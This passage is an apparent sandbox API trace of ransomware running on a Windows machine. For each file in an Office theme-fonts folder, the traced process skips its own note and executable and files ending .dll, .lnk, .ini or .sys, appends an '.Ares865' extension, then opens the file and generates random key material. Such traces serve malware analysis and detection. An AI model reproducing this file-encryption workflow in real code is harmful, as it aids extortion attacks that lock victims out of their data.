GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3509) returned 1 [0073.588] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.589] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.589] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.591] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.592] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.592] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.592] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml.Ares865") returned 84 [0073.592] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\foundry.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\foundry.xml.ares865"), dwFlags=0x1) returned 1 [0073.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\foundry.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.594] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3796) returned 1 [0073.594] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.595] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.595] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.597] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.598] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.598] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.598] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml.Ares865") returned 81 [0073.598] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\grid.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\grid.xml.ares865"), dwFlags=0x1) returned 1 [0073.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\grid.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.599] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3673) returned 1 [0073.600] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.600] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.600] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.602] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.603] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.603] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.604] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml.Ares865") returned 86 [0073.604] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\hardcover.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\hardcover.xml.ares865"), dwFlags=0x1) returned 1 [0073.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\hardcover.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.604] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3849) returned 1 [0073.605] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.605] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.605] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.609] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.610] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.610] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.610] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml.Ares865") returned 84 [0073.610] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\horizon.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\horizon.xml.ares865"), dwFlags=0x1) returned 1 [0073.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\horizon.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.611] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3626) returned 1 [0073.612] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.612] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.612] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.614] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.615] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.615] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.615] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml.Ares865") returned 83 [0073.615] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\median.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\median.xml.ares865"), dwFlags=0x1) returned 1 [0073.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\median.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.616] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3821) returned 1 [0073.617] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.617] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.617] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.619] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.620] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.620] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.620] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml.Ares865") returned 82 [0073.620] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\metro.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\metro.xml.ares865"), dwFlags=0x1) returned 1 [0073.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\metro.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.621] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3603) returned 1 [0073.621] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.622] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.622] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.624] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.625] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.625] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.625] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml.Ares865") returned 83 [0073.625] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\module.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\module.xml.ares865"), dwFlags=0x1) returned 1 [0073.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\module.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.627] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3589) returned 1 [0073.627] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.628] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.628] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.630] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.631] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.631] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.631] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml.Ares865") returned 86 [0073.631] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\newsprint.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\newsprint.xml.ares865"), dwFlags=0x1) returned 1 [0073.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\newsprint.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.632] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3641) returned 1 [0073.632] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.633] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.633] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.635] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.635] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.636] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.636] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml.Ares865") returned 85 [0073.636] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office 2.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office 2.xml.ares865"), dwFlags=0x1) returned 1 [0073.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office 2.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.637] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3605) returned 1 [0073.637] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.638] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.638] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.640] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.641] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.641] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.641] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml.Ares865") returned 93 [0073.641] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic 2.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic 2.xml.ares865"), dwFlags=0x1) returned 1 [0073.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic 2.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.643] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3585) returned 1 [0073.643] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.644] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.644] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.650] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.651] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.651] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0073.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0073.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0073.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0073.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0073.652] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0073.652] CloseHandle (hObject=0x15c) returned 1 [0073.652] CloseHandle (hObject=0x118) returned 1 [0073.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0073.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0073.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0073.653] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefe70d00, ftCreationTime.dwHighDateTime=0x1c9b824, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xefe70d00, ftLastWriteTime.dwHighDateTime=0x1c9b824, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office Classic.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0073.653] lstrcmpiW (lpString1="Office Classic.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.653] lstrcmpiW (lpString1="Office Classic.xml", lpString2="aoldtz.exe") returned 1 [0073.653] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Office Classic.xml" | out: lpString1="Office Classic.xml") returned="Office Classic.xml" [0073.653] lstrlenW (lpString="Office Classic.xml") returned 18 [0073.653] lstrlenW (lpString="Ares865") returned 7 [0073.653] lstrcmpiW (lpString1="sic.xml", lpString2="Ares865") returned 1 [0073.653] lstrlenW (lpString=".dll") returned 4 [0073.653] lstrcmpiW (lpString1="Office Classic.xml", lpString2=".dll") returned 1 [0073.653] lstrlenW (lpString=".lnk") returned 4 [0073.653] lstrcmpiW (lpString1="Office Classic.xml", lpString2=".lnk") returned 1 [0073.653] lstrlenW (lpString=".ini") returned 4 [0073.653] lstrcmpiW (lpString1="Office Classic.xml", lpString2=".ini") returned 1 [0073.653] lstrlenW (lpString=".sys") returned 4 [0073.653] lstrcmpiW (lpString1="Office Classic.xml", lpString2=".sys") returned 1 [0073.653] lstrlenW (lpString="Office Classic.xml") returned 18 [0073.654] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml.Ares865") returned 91 [0073.654] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic.xml.ares865"), dwFlags=0x1) returned 1 [0073.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.655] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3616) returned 1 [0073.656] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.656] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.656] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.659] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.660] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.660] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.661] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7572900, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf7572900, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Opulent.xml", cAlternateFileName="")) returned 1 [0073.661] lstrcmpiW (lpString1="Opulent.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.661] lstrcmpiW (lpString1="Opulent.xml", lpString2="aoldtz.exe") returned 1 [0073.661] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Opulent.xml" | out: lpString1="Opulent.xml") returned="Opulent.xml" [0073.661] lstrlenW (lpString="Opulent.xml") returned 11 [0073.661] lstrlenW (lpString="Ares865") returned 7 [0073.661] lstrcmpiW (lpString1="ent.xml", lpString2="Ares865") returned 1 [0073.661] lstrlenW (lpString=".dll") returned 4 [0073.661] lstrcmpiW (lpString1="Opulent.xml", lpString2=".dll") returned 1 [0073.661] lstrlenW (lpString=".lnk") returned 4 [0073.661] lstrcmpiW (lpString1="Opulent.xml", lpString2=".lnk") returned 1 [0073.661] lstrlenW (lpString=".ini") returned 4 [0073.661] lstrcmpiW (lpString1="Opulent.xml", lpString2=".ini") returned 1 [0073.661] lstrlenW (lpString=".sys") returned 4 [0073.661] lstrcmpiW (lpString1="Opulent.xml", lpString2=".sys") returned 1 [0073.661] lstrlenW (lpString="Opulent.xml") returned 11 [0073.661] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml.Ares865") returned 84 [0073.661] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\opulent.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\opulent.xml.ares865"), dwFlags=0x1) returned 1 [0073.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme 